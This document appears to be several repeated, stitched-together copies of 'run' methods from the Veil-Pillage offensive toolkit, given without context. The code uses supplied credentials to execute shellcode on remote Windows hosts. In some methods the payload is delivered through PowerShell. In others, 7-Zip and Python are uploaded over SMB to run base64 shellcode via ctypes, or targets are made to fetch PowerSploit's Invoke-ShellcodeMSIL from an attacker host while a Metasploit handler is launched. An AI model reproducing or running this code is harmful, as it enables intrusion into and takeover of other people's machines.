def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
# create our powershell payload
p = virtual.Payload()
# pull out any msfpayload payloads/options
if self.args.msfpayload:
p.shellcode.SetPayload(
[self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
p.shellcode.setCustomShellcode(self.args.custshell)
# get the powershell command
powershellCommand = p.generate()
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
"...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn the payload shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(p.shellcode)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
for target in self.targets:
print helpers.color(" [*] Triggering powershell command on " +
target)
# execute the powershell command on each host
command_methods.executeCommand(target, username, password,
powershellCommand, triggerMethod)
self.output += "[*] Powershell inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"
# build our cleanup file -> kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
# create our powershell payload
p = virtual.Payload()
# pull out any msfpayload payloads/options
if self.args.msfpayload:
p.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
p.shellcode.setCustomShellcode(self.args.custshell)
# get the powershell command
powershellCommand = p.generate()
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn the payload shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(p.shellcode)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
for target in self.targets:
print helpers.color(" [*] Triggering powershell command on "+target)
# execute the powershell command on each host
command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod)
self.output += "[*] Powershell inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"
# build our cleanup file -> kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
def run(self):
handlerPath = "none"
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
# nab up some shellcode from Veil-Evasion
sc = shellcode.Shellcode()
# set the payload to use, if specified
if self.args.msfpayload:
sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
sc.setCustomShellcode(self.args.custshell)
# base64 our shellcode
b64sc = base64.b64encode(sc.generate().decode("string_escape"))
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
"...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn our shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(sc)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
# otherwise, if we have a custom handler path, try to invoke that
elif handlerPath.lower() != "none":
if os.path.isdir(handlerPath):
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n [>] Press enter when handler is ready: ")
else:
print helpers.color(" [!] Warning: handlerPath '" +
handlerPath + "' not valid!")
else:
pass
# command to unzip the uploaded python installation
unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
# path to the 7zip binary
zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe"
# command to invoke shellcode using python
pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % (
b64sc)
# path to the minial python isntall
pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip"
for target in self.targets:
# upload the 7zip.exe binary and the python install
uploadResult = smb.uploadFiles(target, username, password, "C$",
"\\Windows\\Temp\\",
[zipPath, pythonPath])
if uploadResult == "success":
self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"
print helpers.color(" [*] Triggering 7zip unzip command on " +
target)
command_methods.executeCommand(target, username, password,
unzipCommand, triggerMethod)
self.output += "[*] 7za unzip command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"
print helpers.color(" [*] Triggering 'python -c' command on " +
target)
command_methods.executeCommand(target, username, password,
pythonCMD, triggerMethod)
self.output += "[*] 'python -c' inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"
# build our cleanup file -> kill all python processes and delete the environments
killCMD = "taskkill /f /im python.exe"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
# command to delete the python extracted directory, zipped python environment and 7za.exe binary
delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delCMD + "|" + triggerMethod + "\n"
else:
self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"
print helpers.color(
"[!] 7za.exe and python.zip unsuccessfully uploaded to " +
target + "\n",
warning=True)
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
use_ssl = self.required_options["use_ssl"][0]
lhost = self.required_options["lhost"][0]
# nab up some shellcode from Veil-Evasion
# users can set custom shellcode there
sc = shellcode.Shellcode()
# set the payload to use, if specified
if self.args.msfpayload:
sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
sc.setCustomShellcode(self.args.custshell)
# generate our shellcode and get it into the correct format
sc_raw = sc.generate()
sc_transformed = ",0".join(sc_raw.split("\\"))[1:]
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
"...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn our shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(sc)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
# path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"
# command to invoke the appropriate shellcode in the script
scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (
sc_transformed)
# trigger the powershell download on all targets
delivery_methods.powershellHostTrigger(self.targets,
username,
password,
secondStagePath,
lhost,
scriptArguments,
triggerMethod,
ssl=use_ssl)
for target in self.targets:
self.output += "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n"
# build our cleanup file -> kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
def run(self):
handlerPath = "none"
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
# nab up some shellcode from Veil-Evasion
sc = shellcode.Shellcode()
# set the payload to use, if specified
if self.args.msfpayload:
sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
sc.setCustomShellcode(self.args.custshell)
# base64 our shellcode
b64sc = base64.b64encode(sc.generate().decode("string_escape"))
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn our shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(sc)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
# otherwise, if we have a custom handler path, try to invoke that
elif handlerPath.lower() != "none":
if os.path.isdir(handlerPath):
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n [>] Press enter when handler is ready: ")
else:
print helpers.color(" [!] Warning: handlerPath '"+handlerPath+"' not valid!")
else: pass
# command to unzip the uploaded python installation
unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
# path to the 7zip binary
zipPath = settings.VEIL_PILLAGE_PATH+"/data/environments/7za.exe"
# command to invoke shellcode using python
pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" %(b64sc)
# path to the minial python isntall
pythonPath = settings.VEIL_PILLAGE_PATH+"/data/environments/python.zip"
for target in self.targets:
# upload the 7zip.exe binary and the python install
uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath])
if uploadResult == "success":
self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"
print helpers.color(" [*] Triggering 7zip unzip command on " + target)
command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod)
self.output += "[*] 7za unzip command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"
print helpers.color(" [*] Triggering 'python -c' command on " + target)
command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod)
self.output += "[*] 'python -c' inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"
# build our cleanup file -> kill all python processes and delete the environments
killCMD = "taskkill /f /im python.exe"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
# command to delete the python extracted directory, zipped python environment and 7za.exe binary
delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+delCMD+"|"+triggerMethod+"\n"
else:
self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"
print helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to "+target+"\n", warning=True)
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
use_ssl = self.required_options["use_ssl"][0]
lhost = self.required_options["lhost"][0]
# nab up some shellcode from Veil-Evasion
# users can set custom shellcode there
sc = shellcode.Shellcode()
# set the payload to use, if specified
if self.args.msfpayload:
sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
sc.setCustomShellcode(self.args.custshell)
# generate our shellcode and get it into the correct format
sc_raw = sc.generate()
sc_transformed = ",0".join(sc_raw.split("\\"))[1:]
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn our shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(sc)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = (
"gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '"
+ handlerPath
+ "'\""
)
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
# path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"
# command to invoke the appropriate shellcode in the script
scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (sc_transformed)
# trigger the powershell download on all targets
delivery_methods.powershellHostTrigger(
self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod, ssl=use_ssl
)
for target in self.targets:
self.output += (
"[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " using "
+ triggerMethod
+ "\n"
)
# build our cleanup file -> kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
self.cleanup += (
"executeCommand|"
+ target
+ "|"
+ username
+ "|"
+ password
+ "|"
+ killCMD
+ "|"
+ triggerMethod
+ "\n"
)
